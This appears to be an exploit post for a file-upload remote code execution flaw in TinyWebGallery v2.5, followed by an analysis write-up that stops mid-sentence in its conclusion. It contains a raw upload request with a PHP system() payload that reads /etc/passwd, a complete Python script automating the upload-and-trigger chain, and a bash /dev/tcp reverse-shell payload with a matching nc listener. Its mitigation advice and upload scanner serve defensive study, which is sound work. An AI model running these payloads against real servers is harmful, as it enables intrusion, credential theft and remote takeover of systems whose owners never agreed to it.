TinyWebGallery v2.5 - Remote Code Execution (RCE)
#Exploit Title: TinyWebGallery v2.5 - Remote Code Execution (RCE)
#Application: TinyWebGallery
#Version: v2.5
#Bugs: RCE
#Technology: PHP
#Vendor URL: http://www.tinywebgallery.com/
#Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest
#Date found: 07-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Go to upload image http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true
2. upload .phar file
payload: <?php echo system("cat /etc/passwd"); ?>
3. request the uploaded file at its gallery link (pictures/shell.phar, see below); the web server executes it as PHP and the response contains the command output
poc request:
POST /twg25/admin/index.php?action=upload&dir=&order=name&srt=yes&tview=no&sview=no&lang=en HTTP/1.1
Host: localhost
Content-Length: 2123
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary53rZRhJinqaMm7Ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k
Connection: close

------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="token"

b2ed5512107a625ef9d5688ced296c61
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2097152
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="confirm"

true
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename="shell.phar"
Content-Type: application/octet-stream

<?php echo system("cat /etc/passwd"); ?>
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="twgsize"

100000
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="twgquality"

80
------WebKitFormBoundary53rZRhJinqaMm7Ip--
file link: http://localhost/twg25/pictures/shell.phar

TinyWebGallery v2.5 Remote Code Execution (RCE) Vulnerability: A Deep Dive into PHP-Based Exploitation
On May 7, 2023, security researcher Mirabbas Ağalarov disclosed a Remote Code Execution (RCE) vulnerability in TinyWebGallery v2.5, a PHP web-based photo gallery. The flaw is an unrestricted file upload in the admin interface: an authenticated administrator can upload a file with a PHP-executable extension into a web-accessible directory, and requesting that file afterwards runs arbitrary commands on the server, potentially leading to full system compromise.
Technical Overview of the Vulnerability
TinyWebGallery allows users to upload, organize, and display images via a web interface. The weakness class here is unrestricted file upload: whatever the admin uploads is written under the web root, and a PHP-capable web server executes any file there whose name matches its PHP handler rule.
The upload endpoint is /admin/index.php?action=upload. The application stores the uploaded file under the filename supplied by the client (the advisory's shell.phar reappears unchanged as pictures/shell.phar) without restricting the extension to image types, so a file with a PHP-executable extension lands where the server will run it.
Exploitation Mechanism: The .phar Extension
The uploaded file is not a PHP archive at all; it is a plain text file containing a <?php ... ?> block, saved with a .phar extension. The extension matters because the PHP handler configuration shipped with common Apache packages (for example the php*.conf on Debian and Ubuntu, whose FilesMatch pattern is .+\.ph(ar|p|tml)$) hands .phar files to the PHP interpreter exactly as it does .php and .phtml. No phar:// stream wrapper and no phar metadata deserialization is involved: the file is served from the upload directory, the server's handler mapping executes it, and the embedded code runs. A filter that only blocked .php would therefore not be enough; the upload handler must cover every extension the server executes.
The payload is the one-liner shown in the advisory above: a PHP echo of system() on cat /etc/passwd. When that file is uploaded through the vulnerable form and then requested through the gallery's file link, the server runs system() and the HTTP response contains the contents of /etc/passwd.
Payload Analysis and Execution Flow
The attack follows a structured sequence:
- Step 1: Navigate to the upload interface at http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true.
- Step 2: Upload a shell.phar file containing the PHP payload.
- Step 3: Request the uploaded file through the gallery's pictures directory, http://localhost/twg25/pictures/shell.phar (the path shown in the advisory).
- Step 4: The web server hands the .phar file to the PHP interpreter and the embedded command runs; its output is returned in the response.
This sequence demonstrates how a simple file upload can become a powerful RCE vector when the application lacks proper file type validation and execution controls.
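The whole chain (fetch the upload form, submit the .phar, request it back) as a script, added here as an example and not part of the advisory or the project. It uses only the standard library and assumes, beyond what the advisory shows, that the upload form renders its hidden token as name="token" value="..." markup (the regex is tolerant of attribute order), that the caller already holds an admin PHPSESSID, and that uploads are written unchanged under pictures/ as the advisory's trigger URL indicates; base URL and cookie are command-line arguments.

```python
"""Reproduce the TinyWebGallery v2.5 upload -> execute chain programmatically.

Added example, not the advisory's own script. Assumptions not confirmed by
the advisory: the upload form's hidden token field is rendered as
<input name="token" value="...">, the caller holds a logged-in admin
PHPSESSID, and the uploaded file is stored unchanged as <base>/pictures/<name>.
"""
import re
import sys
import uuid
import urllib.request
from typing import Optional

# The advisory's payload: one line of PHP, no archive structure at all.
PHP_PAYLOAD = b'<?php echo system("cat /etc/passwd"); ?>'

# 32-hex token as seen in the advisory's request; attribute order may vary.
TOKEN_RE = re.compile(
    r'name=["\']token["\'][^>]*value=["\']([0-9a-f]{32})["\']'
    r'|value=["\']([0-9a-f]{32})["\'][^>]*name=["\']token["\']',
    re.IGNORECASE,
)


def extract_token(html: str) -> Optional[str]:
    """Pull the upload token out of the form page (assumed markup)."""
    m = TOKEN_RE.search(html)
    if not m:
        return None
    return m.group(1) or m.group(2)


def build_upload_body(token: str, filename: str, content: bytes, boundary: str) -> bytes:
    """Build the multipart/form-data body the advisory's request carries.

    Only the fields the server consumes are included; the nine empty
    userfile[] parts the browser sent are padding from a multi-slot form.
    """
    def part(name: str, value: bytes, fname: Optional[str] = None,
             ctype: Optional[str] = None) -> bytes:
        disp = f'Content-Disposition: form-data; name="{name}"'
        if fname is not None:
            disp += f'; filename="{fname}"'
        head = disp.encode()
        if ctype:
            head += b"\r\nContent-Type: " + ctype.encode()
        return b"--" + boundary.encode() + b"\r\n" + head + b"\r\n\r\n" + value + b"\r\n"

    body = part("token", token.encode())
    body += part("MAX_FILE_SIZE", b"2097152")
    body += part("confirm", b"true")
    body += part("userfile[]", content, fname=filename, ctype="application/octet-stream")
    body += part("twgsize", b"100000")
    body += part("twgquality", b"80")
    return body + b"--" + boundary.encode() + b"--\r\n"


def looks_like_passwd(text: str) -> bool:
    """True if the triggered file returned /etc/passwd content (the root entry)."""
    return bool(re.search(r"^root:x:0:0:", text, re.MULTILINE))


def exploit(base_url: str, phpsessid: str, filename: str = "shell.phar") -> str:
    """Fetch the token, upload the payload, request it back; return the response body."""
    headers = {"Cookie": f"PHPSESSID={phpsessid}"}
    form_url = f"{base_url}/admin/index.php?action=upload&sview=no&menu=true"
    with urllib.request.urlopen(urllib.request.Request(form_url, headers=headers)) as r:
        token = extract_token(r.read().decode(errors="replace"))
    if token is None:
        raise RuntimeError("upload token not found; form markup differs from assumption")

    boundary = "----PyBoundary" + uuid.uuid4().hex
    body = build_upload_body(token, filename, PHP_PAYLOAD, boundary)
    up_headers = dict(headers, **{"Content-Type": f"multipart/form-data; boundary={boundary}"})
    upload_url = (f"{base_url}/admin/index.php?action=upload&dir=&order=name"
                  "&srt=yes&tview=no&sview=no&lang=en")
    urllib.request.urlopen(urllib.request.Request(upload_url, data=body, headers=up_headers)).read()

    # Trigger: the file is served from pictures/ and executed by the PHP handler.
    with urllib.request.urlopen(f"{base_url}/pictures/{filename}") as r:
        return r.read().decode(errors="replace")


if __name__ == "__main__":
    # usage: python twg_rce.py http://localhost/twg25 <admin PHPSESSID>
    out = exploit(sys.argv[1].rstrip("/"), sys.argv[2])
    print("RCE confirmed" if looks_like_passwd(out) else "no /etc/passwd in response")
    print(out[:500])
```

The check on the trigger response is deliberately narrow (the root entry of /etc/passwd) so that a 404, a login redirect, or the raw PHP source being served as text (handler not mapped for .phar) all read as failure rather than success.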
Proof of Concept (PoC) Request Structure
The full PoC request is reproduced in the advisory section above; the parts that matter are the request line, the session cookie, the form token, and the file part:

POST /twg25/admin/index.php?action=upload&dir=&order=name&srt=yes&tview=no&sview=no&lang=en HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary53rZRhJinqaMm7Ip
Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k
...
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="token"

b2ed5512107a625ef9d5688ced296c61
...
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename="shell.phar"
Content-Type: application/octet-stream

<?php echo system("cat /etc/passwd"); ?>
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
...
Key observations from this request:
- Boundary: The multipart form uses a unique boundary identifier, typical of browser-generated POST requests.
- File type: the file part's Content-Type is application/octet-stream and the server accepts it. This header is set by the client, so a server-side check against it would not have helped anyway; the only meaningful checks are on the filename extension and the file content.
- Token and session: the request carries the form token and an admin PHPSESSID, so the exploit is post-authentication. An attacker needs admin credentials or a hijacked admin session; the token is read from the upload form and is not a hurdle once logged in.
- File name: shell.phar. The .phar extension is what gets the file executed, since a stock Apache PHP handler maps .phar alongside .php and .phtml; the server keeps the client-supplied name, which is why the trigger URL is predictable.
Risk Assessment and Impact
This vulnerability is serious because of its:
- Simplicity: an admin account (or a captured admin session) and a one-line PHP file are all that is required; there is no memory corruption or race to win.
- High impact: arbitrary command execution as the web server user, which can lead to credential theft from configuration files, lateral movement, or a full server takeover.
- Remote exploitability: the whole chain is two ordinary HTTP requests, so it is trivial to script once credentials are in hand.
Real-world implications include:
- Disclosure of sensitive configuration files (database credentials, the gallery's own admin settings).
- Persistence via a web shell dropped through the same upload path.
- A reverse shell for interactive access to the host.
Security Recommendations and Mitigations
For administrators and developers, immediate actions are required:
- Stop the web server from executing anything under the upload directory: remove the PHP handler for the pictures/ tree (a per-directory configuration that unsets the handler, or a FilesMatch deny for .php, .phar and .phtml), or store uploads outside the document root and serve them through a script that sets the Content-Type itself.
- Validate by allowlist, not blocklist: accept only .jpg, .jpeg, .png and .gif, reject names with more than one extension, and confirm the content is really an image (magic bytes, or a successful decode). A check on the client-supplied Content-Type, or on mime_content_type() alone, is not sufficient: a PHP file with a valid image header passes both.
- Never keep the attacker's filename: generate the stored name on the server, attach the validated extension, and write the file with move_uploaded_file() into the validated directory only, never to a path built from request data.
- Apply a vendor fix when one exists: the advisory names no patched version, so treat v2.5 as vulnerable until TinyWebGallery publishes an update that addresses the upload handling, and monitor the vendor site for advisories.
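The handler rule that makes the .phar trick work, and the allowlist check that closes it, as a Python scanner added here (not TinyWebGallery code). It models the Debian/Ubuntu Apache rule that hands .php, .phar and .phtml to PHP, implements the image allowlist with magic-byte and PHP-open-tag checks described above, and walks an upload directory to flag anything that would execute or is not a real image. The sample directory it builds is constructed for the demonstration; the allowlist, signatures and directory layout are assumptions, not the project's own rules.

```python
"""Hunt for, and reject, PHP-executable uploads in a gallery's pictures directory.

Added example, not TinyWebGallery code. The handler pattern is the one shipped
in Debian/Ubuntu's Apache php*.conf; the allowlist and sample files are
assumptions for illustration.
"""
import re
import tempfile
from pathlib import Path
from typing import List, Tuple

# Stock Apache PHP config: FilesMatch ".+\.ph(ar|p|tml)$". Apache matches this
# case-sensitively; the scanner is case-insensitive to stay conservative
# (case-insensitive filesystems, other servers).
PHP_HANDLER_RE = re.compile(r".+\.ph(ar|p|tml)$", re.IGNORECASE)

# What a gallery should accept. Names with more than one extension are rejected
# because some handler configurations match on any extension in the name.
IMAGE_ALLOWLIST = {"jpg", "jpeg", "png", "gif"}
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def is_php_executable_name(name: str) -> bool:
    """Would a stock Apache PHP handler execute a file with this name?"""
    return bool(PHP_HANDLER_RE.match(name))


def validate_upload(name: str, head: bytes) -> Tuple[bool, str]:
    """Allowlist check a hardened upload handler performs before writing anything.

    `head` is the first few KiB of the upload; the checks are extension
    allowlist, exactly one extension, matching magic bytes, no PHP open tag.
    """
    parts = name.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "filename must be <base>.<ext> with exactly one extension"
    ext = parts[1]
    if ext not in IMAGE_ALLOWLIST:
        return False, f"extension .{ext} not in allowlist"
    if not head.startswith(MAGIC[ext]):
        return False, f"content does not start with the {ext} signature"
    if b"<?php" in head or b"<?=" in head:
        # An image header followed by PHP is a polyglot; it passes MIME checks.
        return False, "PHP open tag in content"
    return True, "ok"


def scan_upload_dir(root: str) -> List[Tuple[str, str]]:
    """Walk an upload directory; report files that would execute or are not images."""
    findings = []
    for p in Path(root).rglob("*"):
        if not p.is_file():
            continue
        head = p.read_bytes()[:4096]
        rel = str(p.relative_to(root))
        if is_php_executable_name(p.name):
            findings.append((rel, "name matches PHP handler"))
            continue
        ok, reason = validate_upload(p.name, head)
        if not ok:
            findings.append((rel, reason))
    return findings


def demo() -> List[Tuple[str, str]]:
    """Constructed sample upload dir: a real PNG, the advisory's shell.phar, a JPEG/PHP polyglot."""
    d = tempfile.mkdtemp()
    (Path(d) / "cat.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
    (Path(d) / "shell.phar").write_bytes(b'<?php echo system("cat /etc/passwd"); ?>')
    (Path(d) / "img.jpg").write_bytes(b"\xff\xd8\xff\xe0" + b'<?php system($_GET["c"]); ?>')
    return sorted(scan_upload_dir(d))


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

Run against a real pictures/ directory with scan_upload_dir(path); anything reported as "name matches PHP handler" is executable right now and should be quarantined before the handler is disabled for that tree.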
Enhanced Payload Example (Improved RCE)
To demonstrate a more powerful exploit, consider a payload that establishes a reverse shell. The first line of the payload was cut off on this page; it is restored here from the standard bash /dev/tcp one-liner, with 192.168.1.100:4444 standing for the attacker's listener:

<?php
// Reverse shell to the attacker's listener (replace host and port); requires bash on the target.
$cmd = "bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'";
system($cmd);
?>

This payload connects back to a listener on port 4444 (for example nc -lvnp 4444 on the attacker host) and gives an interactive shell running as the web server user. Such payloads are commonly used in penetration testing and red team operations.
Conclusion
The TinyWebGallery v2.5 RCE vulnerability underscores